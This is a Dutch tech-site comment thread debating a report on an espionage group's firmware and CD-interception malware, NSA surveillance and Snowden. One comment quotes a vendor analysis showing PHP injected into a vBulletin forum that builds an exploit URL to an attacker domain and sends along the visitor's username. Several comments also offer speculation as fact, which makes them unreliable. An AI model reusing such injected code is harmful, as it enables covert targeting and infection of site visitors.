Wie weet hoeveel andere geavanceerde malware door die groep gebruikt wordt op dit moment. Het hoeft niet zo te zijn dat wanneer deze malware verdwijnt er opeens een zwart gat ontstaat.
Nu ze ontdekt zijn zullen ze waarschijnlijk ontmanteld worden.
Het deel dat bekend wordt. Maar ik zou in zo'n scenario gewoon nog wat sleeper cells achter de hand houden. Gewoon doorgaan met de bezigheden en na verloop van tijd weer dubbelspion zijn.
Straf geven we niet meer, we stellen een commissie in die het 2 jaar onderzoekt a 25.000 euro per maand en concluderen dan dat er ruimte tot verbetering is en dat de betrokken partijen iets te intensief betrokken waren bij de gehele besluitvorming en uitvoering daarvan.

Daarna stelt de voorzitter van de onderzoekscommissie zich verkiesbaar via bijvoorbeeld de PvDA of VVD of .... en:

Vervolgens kiezen een aantal van ons vrolijk verder voor weer een nieuw hoofdstuk in deze discussie ;)
(Kan het niet laten wat beeldspraak te gebruiken hopelijk wordt dat eens gewaardeerd!)

[Reactie gewijzigd door zeelandict op 17 februari 2015 09:26]

"Slachtoffers kregen de malware onder meer via cd's die de groep onderschepte en voorzag van malware. Het onderscheppen van pakketten om malware toe te voegen is een techniek waarvan eerder al bleek dat de Amerikaanse NSA die toepast."

Slim hoor, je Bol.com bestelling onderscheppen en voorzien van spionage software.....maar:

Ik vraag me af waarom dat nodig is als de NSA toch al overal binnen kan d.m.v. Prism/patriot act?
Hiermee kan de NSA dus binnenvallen in het geval dat met Prism of onder de patriot act niet lukt of net iets lastiger is. In andere woorden: ze hebben meerdere manieren om bij ECHT ALLES te kunnen zonder enige feitelijke controle door de Amerikaanse staat/burger.

Dit bevestigd eigenlijk alleen maar wat Snowden jaren geleden al bewezen heeft.

Maar nog steeds kan het niemand echt schelen en zijn er hier op Tweakers zelfs mensen die het Snowden verhaal simpelweg niet eens geloven. Of het wordt afgedaan als "standaard spionage, dat doen alle landen dus het is OK". Triest.

[Reactie gewijzigd door GeoBeo op 17 februari 2015 10:05]

Welk hard bewijs heb JIJ dat je vindt dat Snowden de waarheid spreekt. Welk bewijs heb JIJ dat de NSA al dit soort hacks uitvoert?
Nul komma nul. Alles komt via de media tot jou. Wat je in de media hoort gaat ook weer via verschillende kanalen.
Jij weet niet wie er liegt of de waarheid spreekt in deze kwestie. Snowden heeft helemaal niets bewezen. Hij vertelt zijn verhaal en laat documenten zien. Jij weet niet of Snowdens documenten echt zijn of niet.
Wat Snowden zegt past goed bij alle aannames en geruchten die al lang rondzingen dus dan moet het waar zijn. Of toch niet?
NSA heeft altijd al toegegeven dat ze het doen en dat ze dit volgens de Patriot Act ook gewoon mogen doen. We kunnen al bewijzen dat zij het doen, alleen kan de NSA zich schuilen achter wetten waardoor ze onschendbaar zijn.

Verder is er meerdere malen bewezen dat de NSA en zelfs de FBI gevoelige informatie heeft over politici en op die manier ze onder druk zet om bepaalde wetgevingen te blokkeren.
Wat is DAT voor argument?! Alle informatie over de wereld komt altijd via journalisten tot ons, maar sinds het internet ook via niet-journalisten (Snowden, Julian Assange, etc). Daar zijn journalisten voor en ze vormen dan ook een belangrijk onderdeel van de democratie.

Dus wat jij zegt is dat je per definitie al mijn meningen (en die van anderen) over de wereld waardeloos zijn, omdat alles in de wereldwijde media gelogen zou kunnen zijn? En dat alle media hun leugens op elkaar afstemmen, zodat er een eenduidige leugen uitkomt?

Voor jou is de meest aannemelijke logische verklaring voor Snowden dat het een conspiracy is, dat Snowden alles verzonnen heeft (inclusief het telefoonnummer van Angela Merkel en geheimen over PetroBras) en dat de internationale media helemaal geen bewijzen heeft van Snowden? De hele documentaire gefilmd in Hongkong na zijn ontsnapping is ook allemaal gespeeld? En hij zit gewoon zomaar voor de grap ondergedoken in Rusland?

Geloof je ook in heksen en Sinterklaas? Zo nee, welk bewijs heb JIJ dan dat ze niet bestaan?

Mijn mond valt echt open van dit soort reacties.

[Reactie gewijzigd door GeoBeo op 17 februari 2015 11:33]

Slim hoor, je Bol.com bestelling onderscheppen en voorzien van spionage software.....maar:
Ik vraag me af waarom dat nodig is als de NSA toch al overal binnen kan d.m.v. Prism/patriot act?
Het scheelt weer een sleepnetmethode. De gebruikers van de malware steken vanzelf een keer hun hoofd boven het maaiveld. Dat scheelt zoeken.
Het wordt dus tijd dat de fabrikanten van hardware de firmware van de hardware die origineel is en schoon is van malware beschikbaar stellen voor hun klanten.
Het wordt dus tijd dat de fabrikanten van hardware de firmware van de hardware die origineel is en schoon is van malware beschikbaar stellen voor hun klanten.
Die je dan via door de nsa geÔnfiltreerde servers kunt downloaden ? Waarom zou populaire firmware niet door de nsa c.s. nabehandeld kunnen zijn ? Hoe schoon is een iPhone of een surface-3 ?

Je kunt alles verwachten.
Wat je wilt zijn 2 dingen.

simpelweg een hardware knopje op je harddisk zodat hij niet geflasht meer kan worden. How difficult is that?

en een operating systeem waar niet elke driver alles maar kan en mag doen in het besturingssyteem.

Beide is helaas wishful thinking dat je het ooit tot je beschikking krijgt.

Qua operating system wat het dichtste bij komt is Xen op dit moment. Dat is hele kleine microkernel. Je kunt dan (1 of meer) besturingssystemen laden en op redelijk veilige manier werken.

De firmware hacks hier knallen daar nog dwars doorheen natuurlijk.
Altijd als er weer een nieuwsbericht verschijnt over 'Anonymous' die het een of ander gehacked heeft, vraag ik me af wie of wat in dit geval weer onder deze naam valt. Is het in verscheidene gevallen niet gewoon een deel van de NSA? Waarom ook niet, want hoe prettig is het om dingen te kunnen doen om het vervolgens in de schoenen te schuiven van een vage externe partij.
Het verhullen van de precieze identiteit en afkomst, als wezenlijk onderdeel van hackers die schade aanrichten, sluit perfect aan op het feit dat de NSA als 'geheime' inlichtingendienst haar activiteiten .... inderdaad zo veel mogelijk geheim houdt. In die zin zijn de NSA en vergelijkbare organisaties ideale vrijhavens van waaruit de wereld gemanipuleerd kan worden.
Met als klein probleem dat je eerst medewerking vanuit China en Thailand moet krijgen waar ze die harde schijven produceren. Tenslotte werkt deze sophisticated firmware hack op de harde schijven alleen als je die firmware KUNT veranderen.
Anonymous deed opdrachten voor de FBI.
Zou het helpen om een free bios of zo te installeren? Helpt dat hier tegen? Ik neem namelijk niet aan dat deze twee de enige waren...
nee dit gaat om firmware op randapparatuur.

Je operating systeem op de computer is min of meer monolithisch (windows heeft mooie nieuwe naam voor dezelfde bugs overigens). dus elk device in de computer kan de hele machine hacken.

Dat is natuurlijk problematisch.

Linus woont overigens ondertussen al weer paar jaartjes in USA. Die wil echt Linux kernel niet herschrijven naar iets waarin de grote monolithische nadelen veranderd worden tot iets waarin randapparatuur de zaak niet zo simpel hacken kan.

Grootste probleem is uiteindelijk toch je routertje natuurlijk.
Stiekum is het wel machtig mooi hoe deze groep tewerk is gegaan, natuurlijk springt het herschrijven van harddiskfirmware er wel bovenuit maar zeker niet minder interessant is hoe ze, door middel van php injectie op een bulletin board specifieke targets te grazen namen
This means that the attackers have taken special care not to infect users visiting
from certain ISPs in these countries. If the visitors are from any other IP range,
the PHP script constructs an exploitation URL which includes the logged in
vBulletin forum name:
$htt="http://technology-revealed[.]com/expand/order.php?design=ABRSRgDQlkUALAxGANDrRu
QQofe6Y0THS8E3hfBC+M+k7CdBmTH5gAkLvgV8EV3ULW+7KoUjbJ4UOFU6SVOtgEK7zTgPPNoDH
z4vKecDGe7OzDmJlvwKvc5uYg/I/5x9";
$htt=$htt."&sn=".bin2hex(substr($u,0,14));
The vBulletin forum username is stored in hex, as the “sn=” parameter to the
exploit site. The exploit site can choose to hit the visitor with an exploit depending
on the username, meaning that the attackers are taking great care to infect only
very specific targets on these forums.
Als je verder leest in het document dan komt toch het vermoeden bovendrijven dat het niet 1 bepaalde hackersgroep betreft maar verschillende naties die elkaars hacks natuurlijk hergebruiken voor zichzelf.

Lijkt toch glashelder dat in elk geval 1 van de hackpogingen via die firmware toch door Iran moet zijn gedaan. Die hebben dan weer afspraken met Jordanie, Turkije en Egypte. Zie pagina 25.

https://securelist.com/fi...questions_and_answers.pdf
De vermeende banden tussen NSA en hackers groepering(en) zouden op zich niet onlogisch zijn.
Een 'veilige' manier om bepaalde klussen 'door anderen' te laten uitvoeren en zo zelf buiten schot te blijven / niet aan bepaalde gebeurtenissen gelinkt te worden.

Beetje in de trend van "Met boeven kun je boeven vangen", spionage en genoemde hackersgroepering hebben veel overeenkomsten.

Op dit item kan niet meer gereageerd worden.



Apple iOS 10 Google Pixel Apple iPhone 7 Sony PlayStation VR AMD Radeon RX 480 4GB Battlefield 1 Google Android Nougat Watch Dogs 2

© 1998 - 2016 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Carsom.nl de Persgroep Online Services B.V. Hosting door True